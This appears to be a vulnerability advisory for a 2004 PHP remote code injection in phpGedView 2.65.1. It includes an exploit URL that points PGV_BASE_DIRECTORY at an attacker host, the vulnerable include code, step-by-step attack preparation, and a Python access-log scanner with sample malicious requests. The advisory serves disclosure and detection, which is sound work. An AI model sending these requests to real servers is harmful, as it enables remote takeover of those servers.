PHP Code Injection Vulnerabilities in phpGedView 2.65.1 and prior
Description:
PHP remote code injection vulnerability in the GEDCOM configuration script for phpGedView 2.65.1 and earlier allows remote attackers to execute arbitrary PHP code by modifying the PGV_BASE_DIRECTORY parameter to reference a URL on a remote web server that contains a malicious theme.php script.
External References:
Mitre CVE: CAN-2004-0128
BUGTRAQ: 20040129 PHP Code Injection Vulnerabilities in phpGedView 2.65.1 and prior
Summary:
phpGedView is an open source system for online viewing of GEDCOM information (family tree and genealogy data). Multiple PHP code injection vulnerabilities exist in the phpGedView product. They enable a malicious user to execute commands on the server.
Release Date:
January 29 2004
Severity:
High
SecureScout Testcase ID:
TC 17868 (Still in Development)
Vulnerable Systems:
phpGedView version 2.65.1 and prior
Vulnerability Type:
PHP Injection - forces the target to execute a PHP file from the attacker's server
Vendor Status:
The vendor has been notified and has released version 2.65.3, which fixes the problem.
Example:
(HIGH risk, no authentication needed)
-- HTTP Request --
http://[target]/[phpGedView-directory]/index/[GED_File]_conf.php?PGV_BASE_DIRECTORY=http://attacker&THEME_DIR=/
-- HTTP Request --
Code impacted: [GED_File]_conf.php
// With register_globals On, both $PGV_BASE_DIRECTORY and $THEME_DIR can be
// set from the query string before this code runs.
if (file_exists($PGV_BASE_DIRECTORY.$THEME_DIR."theme.php"))
    require($PGV_BASE_DIRECTORY.$THEME_DIR."theme.php");
else {
    $THEME_DIR = $PGV_BASE_DIRECTORY."themes/standard/";
    require($THEME_DIR."theme.php");
}
The require call is only vulnerable when PHP register_globals is On.
In this case the attacker first has to obtain the name of the GEDCOM file in use: a request to http://[target]/session.php reveals it as an argument of the login.php call.
The attacker then has to create on his web site a directory called themes/standard containing a file theme.php.
For example, a theme.php that calls phpinfo(): the request above will then execute phpinfo() on the vulnerable target.
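The request pattern above leaves a clear trace in web server access logs. As an added example that is not part of the advisory, the following Python scans constructed Apache combined-format lines (documentation IP ranges, not real traffic) for requests to *_conf.php that carry PGV_BASE_DIRECTORY or THEME_DIR in the query string, and rates any URL-valued PGV_BASE_DIRECTORY as a remote-include attempt:

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed Apache combined-format lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [29/Jan/2004:10:01:12 +0000] "GET /phpGedView/index/family_conf.php?PGV_BASE_DIRECTORY=http://198.51.100.9/&THEME_DIR=/ HTTP/1.0" 200 512 "-" "Mozilla/4.0"
203.0.113.8 - - [29/Jan/2004:10:02:30 +0000] "GET /phpGedView/index.php?ged=family.ged HTTP/1.0" 200 8192 "-" "Mozilla/4.0"
203.0.113.9 - - [29/Jan/2004:10:03:45 +0000] "GET /phpGedView/index/family_conf.php?THEME_DIR=/themes/standard/ HTTP/1.0" 200 512 "-" "Mozilla/4.0"
203.0.113.9 - - [29/Jan/2004:10:04:01 +0000] "GET /phpGedView/index/family_conf.php?PGV_BASE_DIRECTORY=%68ttp://198.51.100.9/ HTTP/1.0" 200 512 "-" "Mozilla/4.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Config variables the vulnerable script trusts via register_globals; a client should never supply them.
WATCHED = ("PGV_BASE_DIRECTORY", "THEME_DIR")
# Any URL scheme in PGV_BASE_DIRECTORY turns require() into a remote include.
SCHEME_RE = re.compile(r"^[a-z][a-z0-9+.-]*://", re.IGNORECASE)


def classify_request(target):
    """Return {param: (kind, value)} for a suspicious *_conf.php request, else None."""
    parts = urlsplit(target)
    if not parts.path.endswith("_conf.php"):
        return None
    # parse_qs percent-decodes once, as PHP does, so %68ttp:// is seen as http://
    params = parse_qs(parts.query, keep_blank_values=True)
    hits = {}
    for name in WATCHED:
        for value in params.get(name, []):
            kind = "remote-url" if SCHEME_RE.match(value) else "client-supplied"
            hits[name] = (kind, value)
    return hits or None


def scan_log(text):
    """Scan access-log text; return one finding per request that overrides a watched variable."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        hits = classify_request(m.group("target")) if m else None
        if not hits:
            continue
        severity = "high" if any(k == "remote-url" for k, _ in hits.values()) else "medium"
        findings.append({"ip": m.group("ip"), "time": m.group("ts"), "severity": severity, "params": hits})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["severity"].upper(), f["ip"], f["time"], f["params"])
```

A client-supplied THEME_DIR is rated medium even with a harmless-looking value, because these variables are configuration and should never arrive in a query string at all.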
Credits:
Cedric Cochin - netVigilance Vulnerability Research team
Friday, December 23, 2005